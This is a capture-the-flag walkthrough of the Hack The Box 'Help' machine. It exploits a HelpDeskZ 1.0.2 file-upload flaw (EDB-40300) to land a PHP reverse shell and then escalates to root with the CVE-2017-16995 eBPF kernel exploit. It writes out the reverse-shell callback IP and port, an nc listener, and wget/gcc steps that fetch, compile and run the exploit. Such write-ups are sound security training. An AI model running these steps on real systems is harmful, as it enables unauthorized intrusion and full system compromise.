Target IP: 10.129.230.159
Domain: help.htb
OS: Ubuntu 16.04 (Apache 2.4.18)
Difficulty: Easy
Author: [g1nt0n1c]
1. Phase 1: Reconnaissance & Information Gathering
1.1 TCP Port Discovery
nmap -sV 10.129.230.159Port Analysis & Attack Surface
| Port | Service | Notes |
|---|---|---|
| 80/tcp | Apache 2.4.18 (Ubuntu) | Default Apache page - web app likely mounted at a subdirectory |
| 3000/tcp | Node.js / Express | Returns raw JSON - likely a REST API |
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: Host: 127.0.1.1
1.2 Local Host Resolution
Add the target to /etc/hosts so hostname-based tools and the web app resolve correctly.
# Append the entry without overwriting the file
echo "10.129.230.159 help.htb" | sudo tee -a /etc/hosts1.3 Directory Enumeration
Fuzz for hidden paths. The default Apache page suggests content is mounted under a subdirectory.
# Recursive content discovery with automatic depth control
feroxbuster --url http://help.htbKey findings:
http://help.htb/support- HelpdeskZ support portalhttp://help.htb/support/uploads- Upload storage for tickets
2. Phase 2: Vulnerability Analysis
2.1 Web Application Fingerprinting
Browsing to /support reveals HelpdeskZ - an open-source PHP help desk. Source code inspection reveals nothing useful, but the software is on GitHub.
Version identification via exposed README:
The GitHub repo (ViktorNova/HelpDeskZ) contains a README.md. Since the file is not excluded, we can fetch it directly from the target.
http://help.htb/support/README.md
# => Version: 1.0.2 (released 1st June 2015)
2.2 Exploit Research
Search: "HelpdeskZ 1.0.2 exploit" → EDB-40300
Vulnerability: Unauthenticated arbitrary file upload. The app accepts .php files and renames them using md5(filename + time()) - security through obscurity that we can defeat by reconstructing the timestamp.
2.3 Adapting the Exploit for Python 3
The published PoC (40300.py) was written for Python 2. Three changes are needed:
| Issue | Old (Python 2) | Fixed (Python 3) |
|---|---|---|
| Print statements | print 'Helpdeskz...' | print('Helpdeskz...') |
| MD5 requires bytes | hashlib.md5(plaintext) | hashlib.md5(plaintext.encode()) |
| Unused import | import time | (remove) |
3. Phase 3: Initial Access (PHP Reverse Shell via File Upload)
3.1 Prepare the PHP Reverse Shell
Kali ships a ready-made PHP reverse shell. Copy it and edit the callback IP and port.
# Copy the shell to the current directory
cp /usr/share/webshells/php/php-reverse-shell.php .Edit the file and set:
$ip = '10.10.16.149'; // Your tun0 IP (HTB VPN)
$port = 5555;3.2 Upload the Shell
Navigate to the ticket submission form and attach the PHP file:
http://help.htb/support/?v=submit_ticket&action=displayForm
Fill in the required fields and upload php-reverse-shell.php. The server accepts it and stores it under uploads/tickets/.
The exact name is unknown to us - but not for long.
3.3 Start the Listener
Open a terminal and wait for the callback. rlwrap adds readline support (arrow keys, history) to the raw netcat session.
# -l: listen mode | -v: verbose | -n: no DNS | -p: port
rlwrap nc -lvnp 55553.4 Run the Exploit Script
The script reads the server’s Date response header to get the upload timestamp, then brute-forces backwards through 600 seconds to reconstruct the md5 filename and trigger the shell.
# Usage: python 40300.py <base_url> <filename>
python 40300.py http://help.htb/support/ php-reverse-shell.phpWhen the script finds a 200 OK, it prints the URL. Visit it in a browser or with curl - Apache executes the PHP file and your listener catches a shell as www-data.
3.5 Upgrade the Shell
The raw netcat shell has no TTY. Spawn a proper Bash session via Python’s pty module.
# Spawn a full interactive TTY inside the current process
python -c 'import pty;pty.spawn("/bin/bash")'4. Phase 4: Privilege Escalation (Kernel Exploit - CVE-2017-16995)
4.1 Identify Kernel Vulnerabilities
Run Linux Exploit Suggester against the target’s kernel version to surface applicable exploits.
Key result:
[+] [CVE-2017-16995] eBPF_verifier
Tags: ubuntu=14.04|16.04|17.04
Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
Ubuntu 16.04 ships with an eBPF verifier bug that allows a local user to escalate to root. Full PoC: gugronnier/CVE-2017-16995
4.2 Download the Exploit (on Kali)
Fetch the C source for the exploit.
# Download the exploit source to Kali
wget https://raw.githubusercontent.com/Al1ex/LinuxEelvation/refs/heads/master/CVE-2017-16995/upstream44.c4.3 Serve the File to the Target
Spin up a temporary HTTP server in the directory containing the exploit source.
# Serve the current directory on port 8000
python3 -m http.server4.4 Transfer, Compile & Execute (on Target)
In the www-data shell, pull the source file down, compile it natively, and run it.
# Pull exploit source from Kali (replace IP with your tun0)
wget http://10.10.16.149:8000/upstream44.c
# Compile: -o sets the output binary name
gcc -o pwned upstream44.c
# Run the exploit
./pwned4.5 Verify Root
whoami
# root@help:/home/help#Deep Dive: HelpDeskZ Arbitrary File Upload (EDB-40300)
The core flaw - security through obscurity:
HelpDeskZ performs no server-side validation of uploaded file types. A .php file is accepted and stored as-is. To prevent direct access, the app renames it using:
md5(original_filename + time())
This hides the URL, but the file remains executable PHP on Apache. The only protection is that the attacker doesn’t know the name.
How we defeated the obfuscation:
- The HTTP
Dateresponse header exposes the server’s current Unix timestamp. - We know the original filename (
php-reverse-shell.php). - The upload and the script’s HEAD requests happen within seconds of each other.
- The exploit iterates backwards over 600 timestamps, computing
md5(filename + t)for each and issuing aHEADrequest touploads/tickets/<hash>.php. - A
200 OKmeans we found the live URL - visiting it triggers the shell.
In short: the server’s own clock, readable from response headers, is all the information needed to reconstruct the “secret” filename.
Deep Dive: CVE-2017-16995 - eBPF Verifier Privilege Escalation
Affected kernels: Linux 4.4–4.14 (Ubuntu 14.04 / 16.04 / 17.04)
The Linux kernel’s eBPF (extended Berkeley Packet Filter) subsystem allows unprivileged users to submit small programs for the kernel to run. A verifier is supposed to ensure these programs cannot access arbitrary memory. A sign-extension bug in the verifier allowed a crafted eBPF program to bypass the checks and write to kernel memory - leading to a full root escalation.
Pre-conditions:
CONFIG_BPF_SYSCALLmust be enabled (default on Ubuntu).kernel.unprivileged_bpf_disabledmust not be set to1.
Both conditions are met on a stock Ubuntu 16.04 install, making this box straightforwardly exploitable with a public PoC.